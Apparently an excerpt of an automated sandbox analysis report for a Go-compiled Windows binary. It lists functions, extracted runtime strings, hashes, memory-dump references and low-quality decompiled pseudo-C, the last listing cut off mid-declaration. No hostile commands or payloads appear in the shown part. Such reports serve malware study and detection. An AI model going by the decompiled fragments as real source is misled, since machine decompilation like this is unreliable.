                                                                                                                            Similarity
                                                                                                                            • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3442832105-0
                                                                                                                            • Opcode ID: f224ef4bc0b99063b16ba8605824afb64d911b0e385d29212052daac2cccefab
                                                                                                                            • Instruction ID: 02a461fad148845da8b1ad2d108c308a9e9b81469b25c5370cb476dfbd3eccfe
                                                                                                                            • Opcode Fuzzy Hash: f224ef4bc0b99063b16ba8605824afb64d911b0e385d29212052daac2cccefab
                                                                                                                            • Instruction Fuzzy Hash: AF42C663614E8592FE268B29D8093EDA3B0FF95766F145101FF8917E61EF38C2A2D314
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0131B7E0 Relevance: 11.5, Strings: 9, Instructions: 221COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindCloseHex_DigitInherite, xrefs: 0131BA4F
                                                                                                                            • B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSC, xrefs: 0131BACF
                                                                                                                            • exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLib, xrefs: 0131B9A5
                                                                                                                            • )+,-./0:<=?CLMPSZ[\, xrefs: 0131BB33
                                                                                                                            • pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGuj, xrefs: 0131B956
                                                                                                                            • B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte , xrefs: 0131BAEF
                                                                                                                            • [controller reset]bad lfnode addressbad manualFreeListconnection refusedfaketimeState.lockfile name too longforEachP: not donegarbage collectionidentifier removedindex out of rangeinput/output errormultihop attemptedno child processesno locks availableoperatio, xrefs: 0131BB58
                                                                                                                            • B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindCloseHex_Digi, xrefs: 0131BA6F
                                                                                                                            • % CPU (, goid=, j0 = AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicGODEBUGGranthaHanunooIO waitKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaRadicalSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaUNKNOWNWKOWAODWSARecvWSASend, xrefs: 0131B985
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte $ B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSC$ B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindCloseHex_Digi$ B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindCloseHex_DigitInherite$ exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLib$% CPU (, goid=, j0 = AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicGODEBUGGranthaHanunooIO waitKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaRadicalSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaUNKNOWNWKOWAODWSARecvWSASend$)+,-./0:<=?CLMPSZ[\$[controller reset]bad lfnode addressbad manualFreeListconnection refusedfaketimeState.lockfile name too longforEachP: not donegarbage collectionidentifier removedindex out of rangeinput/output errormultihop attemptedno child processesno locks availableoperatio$pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGuj
                                                                                                                            • API String ID: 0-3153016845
                                                                                                                            • Opcode ID: dd6c5e7e0275eb5c8c73b765a777e0c63043d271df2078dd82b5f1dc49e1ad4c
                                                                                                                            • Instruction ID: 6997ab67459cada58c591e175b71a78dee5478a6a3488b1d098a65712f5318a8
                                                                                                                            • Opcode Fuzzy Hash: dd6c5e7e0275eb5c8c73b765a777e0c63043d271df2078dd82b5f1dc49e1ad4c
                                                                                                                            • Instruction Fuzzy Hash: 8EA1A631614F8585DA06EF29E48039BBB65FBE9B84F448222DE4E17B39DF38C580C714
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0130ACE0 Relevance: 8.1, Strings: 6, Instructions: 553COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • mallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewruntime: unable to acquire - semaphore out of syncfatal: systemstack called from unexpected goroutinepotentially overlapping in-use allocations detectedruntime:, xrefs: 0130B5D8
                                                                                                                            • mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in reset, xrefs: 0130B5A5
                                                                                                                            • delayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characterpanicwrap: unexpected string after package name: runtime: unexpe, xrefs: 0130B55C
                                                                                                                            • malloc deadlockmisaligned maskmissing mcache?ms: gomaxprocs=network is downno medium foundno such processpreempt SPWRITErecovery failedruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding p alre, xrefs: 0130B5C7
                                                                                                                            • malloc during signalnotetsleep not on g0p mcache not flushedpacer: assist ratio=preempt off reason: reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer , xrefs: 0130B5B6
                                                                                                                            • !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, xrefs: 0130B0B3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC$delayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characterpanicwrap: unexpected string after package name: runtime: unexpe$malloc deadlockmisaligned maskmissing mcache?ms: gomaxprocs=network is downno medium foundno such processpreempt SPWRITErecovery failedruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding p alre$malloc during signalnotetsleep not on g0p mcache not flushedpacer: assist ratio=preempt off reason: reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer $mallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewruntime: unable to acquire - semaphore out of syncfatal: systemstack called from unexpected goroutinepotentially overlapping in-use allocations detectedruntime:$mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in reset
                                                                                                                            • API String ID: 0-713770572
                                                                                                                            • Opcode ID: e1e5c1c5ce2c7ddd09937572932f827009167956fb5d9c748ed744041a821a6e
                                                                                                                            • Instruction ID: 0444216ff6c05b1b21d5a3aba364ec20a779e11f9bbf5362c435536449eb9458
                                                                                                                            • Opcode Fuzzy Hash: e1e5c1c5ce2c7ddd09937572932f827009167956fb5d9c748ed744041a821a6e
                                                                                                                            • Instruction Fuzzy Hash: 5D32B476208B84C2EB56CB19E4507AAFBA5F389BD8F588116DF9D43BA9DB3CC444C700
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0131B3A0 Relevance: 6.4, Strings: 5, Instructions: 144COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 42%
                                                                                                                            			E0131B3A0(long long __rax, long long __rbx, long long __rcx, intOrPtr __rdx, long long __rbp, void* __r11, void* __r14, long long _a8, long long _a16, long long _a24) {
				char _v8;
				unsigned int _v16;
				unsigned int _v24;
				unsigned int _v32;
				long long _v40;
				long long _v56;
				void* _t47;
				void* _t49;
				void* _t71;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t79;
				intOrPtr _t87;
				unsigned int _t104;
				intOrPtr _t107;
				long long _t115;
				intOrPtr _t117;
				unsigned int _t118;
				char* _t124;
				void* _t126;
				void* _t129;
				void* _t130;

				L0:
				while(1) {
					L0:
					_t130 = __r14;
					_t129 = __r11;
					_t105 = __rcx;
					_t102 = __rbx;
					_t85 = __rax;
					if(_t126 >  *((intOrPtr*)(__r14 + 0x10))) {
						break;
					}
					L17:
					_a8 = __rax;
					_a16 = __rbx;
					_a24 = __rcx;
					E01356200(__rdx, __rbp);
				}
				L1:
				_v8 = __rbp;
				_t124 =  &_v8;
				_t4 = __rax + 0xb0;
				 *_t4 = __rdx;
				_t6 = __rax + 0xb8;
				 *_t6 =  *_t4;
				 *((intOrPtr*)(__rax + 0xc0)) =  *_t6;
				asm("inc esp");
				asm("inc esp");
				 *((long long*)(__rax + 0xe8)) = 0;
				 *((long long*)(__rax + 0xf0)) = __rbx;
				 *((long long*)(__rax + 0x90)) =  *((intOrPtr*)(__rax + 0x98));
				_t115 =  *((intOrPtr*)(__rax + 0x78)) + 0x10000;
				_t79 =  *((intOrPtr*)(__rax + 0x68)) - _t115;
				if(_t79 < 0) {
					 *((long long*)(__rax + 0x68)) = _t115;
				}
				asm("xorps xmm0, xmm0");
				asm("repne dec eax");
				asm("movsd xmm1, [0xfb07e]");
				asm("mulsd xmm1, xmm0");
				asm("movsd xmm2, [0xfb082]");
				asm("addsd xmm2, xmm1");
				asm("repne dec eax");
				 *((long long*)(_t85 + 0xf8)) = _t115;
				asm("xorps xmm2, xmm2");
				asm("repne dec eax");
				asm("movups xmm3, xmm2");
				asm("divsd xmm2, xmm1");
				asm("movsd xmm4, [0xfb07b]");
				asm("subsd xmm2, xmm4");
				asm("movsd xmm4, [0xfb0df]");
				asm("ucomisd xmm4, xmm2");
				if(_t79 > 0) {
					L5:
					asm("ucomisd xmm3, xmm1");
					if(_t79 > 0) {
						 *((long long*)(_t85 + 0xf8)) = _t115 - 1;
					}
					asm("xorps xmm2, xmm2");
					asm("repne dec eax");
					asm("subsd xmm1, xmm2");
					asm("divsd xmm1, xmm0");
					asm("movsd [eax+0x110], xmm1");
				} else {
					asm("movsd xmm4, [0xfb039]");
					asm("ucomisd xmm2, xmm4");
					if(_t79 <= 0) {
						asm("xorps xmm0, xmm0");
						asm("movsd [eax+0x110], xmm0");
					} else {
						goto L5;
					}
				}
				if( *0x14cf798 > 0) {
					 *((long long*)(_t85 + 0xf8)) = _t105;
					asm("xorps xmm0, xmm0");
					asm("movsd [eax+0x110], xmm0");
				}
				_t107 =  *0x147b560; // 0xc00001c000
				_t117 =  *0x147b568; // 0x4
				while(_t102 < _t117) {
					asm("inc esp");
					_t102 = _t102 + 1;
				}
				_a8 = _t85;
				_t49 = E0131B680(_t47, _t85, _t107, _t129);
				if( *0x14cf790 > 0) {
					_t87 = _a8;
					_t108 =  *((intOrPtr*)(_t87 + 0x100));
					_v56 =  *((intOrPtr*)(_t87 + 0x100));
					_t118 =  *0x14cfce0; // 0x168d0
					_v16 = _t118;
					_t104 =  *0x147b9e8; // 0x0
					_v24 = _t104;
					_v32 =  *((intOrPtr*)(_t87 + 0x68));
					_v40 =  *((intOrPtr*)(_t87 + 0xf8));
					asm("movsd xmm0, [eax+0x110]");
					asm("movsd [esp+0x18], xmm0");
					E01332340(_t118, _t124, _t130);
					E01332C40(_t71, _t75, _t76, _t77, 0x13899a0, _t104, _t124, _t130);
					asm("dec ax");
					L01332640(_t71, _t75, _t76, _t77, _t104,  *((intOrPtr*)(_t87 + 0x100)), _t118,  *((intOrPtr*)(_t87 + 0xf8)), _t124, _t130);
					E01332C40(_t71, _t75, _t76, _t77, 0x1386d43, _t104, _t124, _t130);
					E01332940(_t75, _t76, _t77, _v16 >> 0x14,  *((intOrPtr*)(_t87 + 0x100)), _t124, _t130);
					E01332C40(_t71, _t75, _t76, _t77, 0x1386d51, _t104, _t124, _t130);
					E01332940(_t75, _t76, _t77, _v24 >> 0x14,  *((intOrPtr*)(_t87 + 0x100)), _t124, _t130);
					E01332C40(_t71, _t75, _t76, _t77, 0x13867b5, _t104, _t124, _t130);
					E01332940(_t75, _t76, _t77, _v32 >> 0x14, _t108, _t124, _t130);
					E01332C40(_t71, _t75, _t76, _t77, 0x1387dde, _t104, _t124, _t130);
					E01332A40(_t71, 0, _t75, _t76, _t77, _v40,  *((intOrPtr*)(_t87 + 0x68)), _t124, _t130);
					E01332C40(_t71, _t75, _t76, _t77,  &M0138678B, _t104, _t124, _t130);
					asm("movsd xmm0, [esp+0x18]");
					L01332640(_t71, _t75, _t76, _t77, _t104, _t108, _t118,  *((intOrPtr*)(_t87 + 0xf8)), _t124, _t130);
					E013325A0(_t71, 0, _t75, _t76, _t77, _t124, _t130);
					_t49 = L013323C0(_t118, _t124, _t130);
				}
				return _t49;
			}


























                                                                                                                            0x0131b3a0
                                                                                                                            0x0131b3a0
                                                                                                                            0x0131b3a0
                                                                                                                            0x0131b3a0
                                                                                                                            0x0131b3a0
                                                                                                                            0x0131b3a0
                                                                                                                            0x0131b3a0
                                                                                                                            0x0131b3a0
                                                                                                                            0x0131b3a4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0131b639
                                                                                                                            0x0131b639
                                                                                                                            0x0131b63e
                                                                                                                            0x0131b643
                                                                                                                            0x0131b648
                                                                                                                            0x0131b657
                                                                                                                            0x0131b3aa
                                                                                                                            0x0131b3ae
                                                                                                                            0x0131b3b3
                                                                                                                            0x0131b3ba
                                                                                                                            0x0131b3ba
                                                                                                                            0x0131b3c4
                                                                                                                            0x0131b3c4
                                                                                                                            0x0131b3ce
                                                                                                                            0x0131b3d5
                                                                                                                            0x0131b3dd
                                                                                                                            0x0131b3e5
                                                                                                                            0x0131b3f0
                                                                                                                            0x0131b3fe
                                                                                                                            0x0131b409
                                                                                                                            0x0131b410
                                                                                                                            0x0131b414
                                                                                                                            0x0131b416
                                                                                                                            0x0131b416
                                                                                                                            0x0131b41a
                                                                                                                            0x0131b41d
                                                                                                                            0x0131b422
                                                                                                                            0x0131b42a
                                                                                                                            0x0131b42e
                                                                                                                            0x0131b436
                                                                                                                            0x0131b43a
                                                                                                                            0x0131b43f
                                                                                                                            0x0131b446
                                                                                                                            0x0131b449
                                                                                                                            0x0131b44e
                                                                                                                            0x0131b451
                                                                                                                            0x0131b455
                                                                                                                            0x0131b45d
                                                                                                                            0x0131b461
                                                                                                                            0x0131b469
                                                                                                                            0x0131b46d
                                                                                                                            0x0131b47d
                                                                                                                            0x0131b47d
                                                                                                                            0x0131b481
                                                                                                                            0x0131b486
                                                                                                                            0x0131b486
                                                                                                                            0x0131b494
                                                                                                                            0x0131b497
                                                                                                                            0x0131b49c
                                                                                                                            0x0131b4a0
                                                                                                                            0x0131b4a4
                                                                                                                            0x0131b46f
                                                                                                                            0x0131b46f
                                                                                                                            0x0131b477
                                                                                                                            0x0131b47b
                                                                                                                            0x0131b4ae
                                                                                                                            0x0131b4b1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0131b47b
                                                                                                                            0x0131b4c0
                                                                                                                            0x0131b4c2
                                                                                                                            0x0131b4c9
                                                                                                                            0x0131b4cc
                                                                                                                            0x0131b4cc
                                                                                                                            0x0131b4d4
                                                                                                                            0x0131b4db
                                                                                                                            0x0131b4f7
                                                                                                                            0x0131b4ec
                                                                                                                            0x0131b4f4
                                                                                                                            0x0131b4f4
                                                                                                                            0x0131b4fc
                                                                                                                            0x0131b501
                                                                                                                            0x0131b50d
                                                                                                                            0x0131b515
                                                                                                                            0x0131b51a
                                                                                                                            0x0131b521
                                                                                                                            0x0131b526
                                                                                                                            0x0131b52d
                                                                                                                            0x0131b532
                                                                                                                            0x0131b539
                                                                                                                            0x0131b542
                                                                                                                            0x0131b54e
                                                                                                                            0x0131b553
                                                                                                                            0x0131b55b
                                                                                                                            0x0131b561
                                                                                                                            0x0131b572
                                                                                                                            0x0131b57c
                                                                                                                            0x0131b581
                                                                                                                            0x0131b592
                                                                                                                            0x0131b5a0
                                                                                                                            0x0131b5b1
                                                                                                                            0x0131b5c0
                                                                                                                            0x0131b5d1
                                                                                                                            0x0131b5e0
                                                                                                                            0x0131b5f1
                                                                                                                            0x0131b600
                                                                                                                            0x0131b611
                                                                                                                            0x0131b616
                                                                                                                            0x0131b620
                                                                                                                            0x0131b625
                                                                                                                            0x0131b62a
                                                                                                                            0x0131b62a
                                                                                                                            0x0131b638

                                                                                                                            Strings
                                                                                                                            • pacer: assist ratio=preempt off reason: reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found pcHeader.textStart= previous allocCoun, xrefs: 0131B566
                                                                                                                            • +,-./0:<=?CLMPSZ[\, xrefs: 0131B605
                                                                                                                            • ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKS, xrefs: 0131B5C5
                                                                                                                            • (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicGODEBUGGranthaHanunooIO waitKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaR, xrefs: 0131B586
                                                                                                                            • MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep waitGunjala_Gondi, xrefs: 0131B5E5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicGODEBUGGranthaHanunooIO waitKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaR$ MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep waitGunjala_Gondi$+,-./0:<=?CLMPSZ[\$->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKS$pacer: assist ratio=preempt off reason: reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found pcHeader.textStart= previous allocCoun
                                                                                                                            • API String ID: 0-3856851786
                                                                                                                            • Opcode ID: 1f3aeb9e3a43c0569941fd6f04319a0c42f8e3562d08eeb3012c119fb1c737c6
                                                                                                                            • Instruction ID: 35cf77f376a5640d6bedc8a4ac02cd8393356362ca0618dc0fdffe9916d8717f
                                                                                                                            • Opcode Fuzzy Hash: 1f3aeb9e3a43c0569941fd6f04319a0c42f8e3562d08eeb3012c119fb1c737c6
                                                                                                                            • Instruction Fuzzy Hash: 4C617F72504F8589D606EF29E48039AB7A5FBAABC4F05D236EA4E17739DF38C090C740
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01334F00 Relevance: 5.3, Strings: 4, Instructions: 251COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 48%
                                                                                                                            			E01334F00(char __ebx, signed char __ecx, void* __edi, void* __esp, void* __eflags, long long __rax, signed long long __rbx, signed long long __rcx, long long __rdx, long long __rbp, void* _a8, char _a16, signed char _a20) {
				char _v8;
				signed char _v12;
				intOrPtr _v16;
				char _v24;
				long long _v32;
				long long _v40;
				signed long long _v48;
				char _v72;
				long long _v80;
				signed long long _v88;
				char _t70;
				void* _t74;
				char _t87;
				signed char _t93;
				void* _t98;
				intOrPtr _t99;
				signed char _t100;
				signed char _t102;
				void* _t103;
				void* _t104;
				void* _t106;
				void* _t107;
				void* _t109;
				void* _t116;
				long long _t117;
				void* _t121;
				intOrPtr _t123;
				long long _t130;
				signed long long _t135;
				signed long long _t138;
				signed long long _t141;
				long long _t143;
				signed long long _t144;
				intOrPtr _t152;
				long long _t154;
				intOrPtr _t155;
